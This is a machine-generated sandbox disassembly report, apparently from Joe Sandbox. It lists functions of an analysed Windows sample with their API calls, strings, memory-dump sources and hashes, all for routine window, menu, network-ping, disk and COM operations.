Instruction Fuzzy Hash: A4416B74A05285EFDB21DFA5D884AAABBBAFF49300F144429F905973A0DB31AD10DF51

Uniqueness

Uniqueness Score: -1.00%

Function 009E772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009E77CD
CreateCompatibleDC.GDI32(00000000), ref: 009E77D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009E77E7
SelectObject.GDI32(00000000,00000000), ref: 009E77EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 009E77FA
DeleteDC.GDI32(00000000), ref: 009E7803
GetWindowLongW.USER32(?,000000EC), ref: 009E780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009E7821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009E782D

Strings

static, xrefs: 009E7765

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 96946fa06e20233895afdd4e8e5d06054f42d7d07439b5943434d36bb3674fa2
Instruction ID: fedaa4696796450793eb92467c14f8cd5a776584d5dc907d60185dc4da23170c
Opcode Fuzzy Hash: 96946fa06e20233895afdd4e8e5d06054f42d7d07439b5943434d36bb3674fa2
Instruction Fuzzy Hash: 2D31AC32119198BBDF129FA5DC58FEA3B6DEF49720F100225FA15A60A0C731DC11EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00987040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0098707B

Part of subcall function 00988D68: __getptd_noexit.LIBCMT ref: 00988D68

__gmtime64_s.LIBCMT ref: 00987114
__gmtime64_s.LIBCMT ref: 0098714A
__gmtime64_s.LIBCMT ref: 00987167
__allrem.LIBCMT ref: 009871BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009871D9
__allrem.LIBCMT ref: 009871F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0098720E
__allrem.LIBCMT ref: 00987225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00987243
__invoke_watson.LIBCMT ref: 009872B4

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 030839865589b835e9e6073d364ea079257c7f16c5205ccd9ec7448030a161cf
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: B371D971A04717ABEB14FEBDCC81B6AF3A8AF51324F24822AF914D7781E770D9408790

Uniqueness

Uniqueness Score: -1.00%

Function 009C2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009C2A31
GetMenuItemInfoW.USER32(00A26890,000000FF,00000000,00000030), ref: 009C2A92
SetMenuItemInfoW.USER32(00A26890,00000004,00000000,00000030), ref: 009C2AC8
Sleep.KERNEL32(000001F4), ref: 009C2ADA
GetMenuItemCount.USER32(?), ref: 009C2B1E
GetMenuItemID.USER32(?,00000000), ref: 009C2B3A
GetMenuItemID.USER32(?,-00000001), ref: 009C2B64
GetMenuItemID.USER32(?,?), ref: 009C2BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009C2BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C2C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C2C24

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 88afc8bb75e28ec614069062df1c1660b4cf32a22ed5c991a7e8b3d63a36aec0
Instruction ID: 75deabd3016544c9bf62ef60d79fc24330811df6b21ba3c106446da1a3c9703b
Opcode Fuzzy Hash: 88afc8bb75e28ec614069062df1c1660b4cf32a22ed5c991a7e8b3d63a36aec0
Instruction Fuzzy Hash: BF617DB0D14249AFDB21CFA4C898FBE7BB8EB45304F1445ADF84197291DB31AD46DB22

Uniqueness

Uniqueness Score: -1.00%

Function 009E7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009E7214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009E7217
GetWindowLongW.USER32(?,000000F0), ref: 009E723B
_memset.LIBCMT ref: 009E724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009E725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009E72D6

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: c7ae2218445fc1e208c7d22f81fc3fcf7d55d7732154a5b7e40cbb3765cda715
Instruction ID: 6412e2ab559e317ab1335323d0a250390e911fb87d72c8092601f925a7642d1f
Opcode Fuzzy Hash: c7ae2218445fc1e208c7d22f81fc3fcf7d55d7732154a5b7e40cbb3765cda715
Instruction Fuzzy Hash: 13618071900248AFDB21DFA8CC81EEEB7F8EB09700F140169FA14A72A1D770AD42DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009B710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009B7135
SafeArrayAllocData.OLEAUT32(?), ref: 009B718E
VariantInit.OLEAUT32(?), ref: 009B71A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 009B71C0
VariantCopy.OLEAUT32(?,?), ref: 009B7213
SafeArrayUnaccessData.OLEAUT32(?), ref: 009B7227
VariantClear.OLEAUT32(?), ref: 009B723C
SafeArrayDestroyData.OLEAUT32(?), ref: 009B7249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009B7252
VariantClear.OLEAUT32(?), ref: 009B7264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009B726F

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 528e0b88c6926ceb098fe0c7ed56d7bd4953ad7b756e76329f00f73ccd24d3a9
Instruction ID: d0066e60f1e58309cc843d57518ba39fbb406dab8c709d4dd96d3edc340b060a
Opcode Fuzzy Hash: 528e0b88c6926ceb098fe0c7ed56d7bd4953ad7b756e76329f00f73ccd24d3a9
Instruction Fuzzy Hash: EC415435904119AFCF00DFA8D998DEEBBB9FF88354F008169F9159B261DB30AD45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009D5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009D5AA6
inet_addr.WSOCK32(?,?,?), ref: 009D5AEB
gethostbyname.WSOCK32(?), ref: 009D5AF7
IcmpCreateFile.IPHLPAPI ref: 009D5B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009D5B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009D5B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 009D5C00
WSACleanup.WSOCK32 ref: 009D5C06

Strings

Ping, xrefs: 009D5B29

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: e4435f99391425ae6ea174b0ba515abd7486af03436c8040cc76255a0c7a9f54
Instruction ID: 67f50faf54b4db29126d18a858f7be0a4a92d1ab7122a78b327d41de003f2a3f
Opcode Fuzzy Hash: e4435f99391425ae6ea174b0ba515abd7486af03436c8040cc76255a0c7a9f54
Instruction Fuzzy Hash: 45516C316447009FDB20AF24CC95B2AB7E8EF88710F15892BF596DB2A1DB78ED409B45

Uniqueness

Uniqueness Score: -1.00%

Function 009CB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009CB73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009CB7B1
GetLastError.KERNEL32 ref: 009CB7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 009CB828

Strings

NOTREADY, xrefs: 009CB7E7
READY, xrefs: 009CB801
UNKNOWN, xrefs: 009CB7E0
READONLY, xrefs: 009CB7F3
INVALID, xrefs: 009CB7FA

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 5cb926bb071da91bcee7ac42ac92d21ab7161afdce9f66457a58fa41aafc7ced
Instruction ID: f4b57c1a92ab8b02e0e03474e7081e23547c55166049eafe0b0776fbc39b0cf1
Opcode Fuzzy Hash: 5cb926bb071da91bcee7ac42ac92d21ab7161afdce9f66457a58fa41aafc7ced
Instruction Fuzzy Hash: D9316335E00209AFDB10EF68D886FEE7BB8FF94750F14442AE9029B291DB759D42C752

Uniqueness

Uniqueness Score: -1.00%

Function 009B9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

Part of subcall function 009BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009BB0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009B94F6
GetDlgCtrlID.USER32 ref: 009B9501
GetParent.USER32 ref: 009B951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 009B9520
GetDlgCtrlID.USER32(?), ref: 009B9529
GetParent.USER32(?), ref: 009B9545
SendMessageW.USER32(00000000,?,?,00000111), ref: 009B9548

Strings

ListBox, xrefs: 009B94B3
ComboBox, xrefs: 009B947E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 91eae4b280b41184247b86de9568d0caf3aaceaf5f477dce7181c8e7de45f74f
Instruction ID: ece14b0597c773a635fb8e33289d53cbc91b26507ab805564e049572a8377603
Opcode Fuzzy Hash: 91eae4b280b41184247b86de9568d0caf3aaceaf5f477dce7181c8e7de45f74f
Instruction Fuzzy Hash: B721D670904148BBCF05ABA4CCD5EFEBB79EF85310F104116BA619B2E2DB759919DB20

Uniqueness

Uniqueness Score: -1.00%

Function 009B955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

Part of subcall function 009BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009BB0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009B95DF
GetDlgCtrlID.USER32 ref: 009B95EA
GetParent.USER32 ref: 009B9606
SendMessageW.USER32(00000000,?,00000111,?), ref: 009B9609
GetDlgCtrlID.USER32(?), ref: 009B9612
GetParent.USER32(?), ref: 009B962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 009B9631

Strings

ListBox, xrefs: 009B959E
ComboBox, xrefs: 009B9569

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 8f9eb7d93d3a9907af4dcc0c5c2c4d8bc3c59e313ebea72301d9e32ff63d986e
Instruction ID: aae913bdcb534b1be50400d11473d28708b8b6fed2bc5858740b3b3edffa598e
Opcode Fuzzy Hash: 8f9eb7d93d3a9907af4dcc0c5c2c4d8bc3c59e313ebea72301d9e32ff63d986e
Instruction Fuzzy Hash: 1721F570904248BBDF00ABA4CDD5EFEBB79EF88310F104016FA51971A5DB759919DB20

Uniqueness

Uniqueness Score: -1.00%

Function 009B9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009B9651
GetClassNameW.USER32(00000000,?,00000100), ref: 009B9666
_wcscmp.LIBCMT ref: 009B9678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009B96F3

Strings

details, xrefs: 009B96A1
smallicons, xrefs: 009B96BB
SHELLDLL_DefView, xrefs: 009B9672
largeicons, xrefs: 009B9687
list, xrefs: 009B96D5

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: f1baafdc05848134c14fb232a40739d2c87cdbfa28d985146c3407391350b04d
Instruction ID: cbb536772d6241db18ee154f9d69385aa3b0e419001257adcb917fd696f411e5
Opcode Fuzzy Hash: f1baafdc05848134c14fb232a40739d2c87cdbfa28d985146c3407391350b04d
Instruction Fuzzy Hash: 0B11297625C347FAFA013620DD2BEE7779C9B05B70F20002AFB04B50D1FEA66D509A58

Uniqueness

Uniqueness Score: -1.00%

Function 009D8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009D8BEC
CoInitialize.OLE32(00000000), ref: 009D8C19
CoUninitialize.OLE32 ref: 009D8C23
GetRunningObjectTable.OLE32(00000000,?), ref: 009D8D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 009D8E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,009F2C0C), ref: 009D8E84
CoGetObject.OLE32(?,00000000,009F2C0C,?), ref: 009D8EA7
SetErrorMode.KERNEL32(00000000), ref: 009D8EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009D8F3A
VariantClear.OLEAUT32(?), ref: 009D8F4A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 573e8813958abb8cbf5d3a5cf649fb7a04b21308d4bd120074b539e9937994a2
Instruction ID: a923e9b6db925fbe0f9d594cdc071ca0eb9d920d208579bcb6b4defee6a90ebc
Opcode Fuzzy Hash: 573e8813958abb8cbf5d3a5cf649fb7a04b21308d4bd120074b539e9937994a2
Instruction Fuzzy Hash: 1EC1F671608305AFD700EF68C884A2BB7E9BF89748F10895EF5899B391DB71ED05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009C4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 009C419D
__swprintf.LIBCMT ref: 009C41AA

Part of subcall function 009838D8: __woutput_l.LIBCMT ref: 00983931

FindResourceW.KERNEL32(?,?,0000000E), ref: 009C41D4
LoadResource.KERNEL32(?,00000000), ref: 009C41E0
LockResource.KERNEL32(00000000), ref: 009C41ED
FindResourceW.KERNEL32(?,?,00000003), ref: 009C420D
LoadResource.KERNEL32(?,00000000), ref: 009C421F
SizeofResource.KERNEL32(?,00000000), ref: 009C422E
LockResource.KERNEL32(?), ref: 009C423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009C429B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 10ee1b24d0485968215335bd1a43a50da6096415bd827a79e3a457df1ab73aa5
Instruction ID: 0b68302128f8c4ee9f1b970a3ee9c9eabb11ea0b5fa0b876bfec6782a1ca8666
Opcode Fuzzy Hash: 10ee1b24d0485968215335bd1a43a50da6096415bd827a79e3a457df1ab73aa5
Instruction Fuzzy Hash: E731D271A0524AABCB109FA0DCA5FBF7BACEF08301F004529F921D6250D734DE52DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0096FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0096FC06
OleUninitialize.OLE32(?,00000000), ref: 0096FCA5
UnregisterHotKey.USER32(?), ref: 0096FDFC
DestroyWindow.USER32(?), ref: 009A4A00
FreeLibrary.KERNEL32(?), ref: 009A4A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 009A4A92

Strings

close all, xrefs: 0096FC01

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 9d2119927e4f3ec25cedb42822d79abd65d295ee1133c819a9935a159c51e875
Instruction ID: 83bebfee57d64b1e8dab894f9b9f229433c85091ae8dcc5ecef57c14d161be26
Opcode Fuzzy Hash: 9d2119927e4f3ec25cedb42822d79abd65d295ee1133c819a9935a159c51e875
Instruction Fuzzy Hash: 97A17E31701212CFCB29EF54D5A5B69F768BF85700F1582ADE80AAB261CB70ED16CF94

Uniqueness

Uniqueness Score: -1.00%

Function 009BA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,009BAA64), ref: 009BA9A2

Strings

CLASS, xrefs: 009BA721
INSTANCE, xrefs: 009BA8B0
REGEXPCLASS, xrefs: 009BA767
TEXT, xrefs: 009BA8D9
NAME, xrefs: 009BA7D4
CLASSNN, xrefs: 009BA744

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 580f4d9fb6f61dfbf019905215b73c53d97909c8e860484e6c3c33b2250bf310
Instruction ID: 1af7a8b19d6ea8b6f1aec76c7545bf79e6553704193675cb5b02114d9b64bd01
Opcode Fuzzy Hash: 580f4d9fb6f61dfbf019905215b73c53d97909c8e860484e6c3c33b2250bf310
Instruction Fuzzy Hash: 6791D930A00606EBDB18EF70C591BEDFB79BF44324F108119D899A7291DF307A99DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00962E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00962EAE

Part of subcall function 00961DB3: GetClientRect.USER32(?,?), ref: 00961DDC
Part of subcall function 00961DB3: GetWindowRect.USER32(?,?), ref: 00961E1D
Part of subcall function 00961DB3: ScreenToClient.USER32(?,?), ref: 00961E45

GetDC.USER32 ref: 0099CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0099CF95
SelectObject.GDI32(00000000,00000000), ref: 0099CFA3
SelectObject.GDI32(00000000,00000000), ref: 0099CFB8
ReleaseDC.USER32(?,00000000), ref: 0099CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0099D04B

Strings

U, xrefs: 0099CF20

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

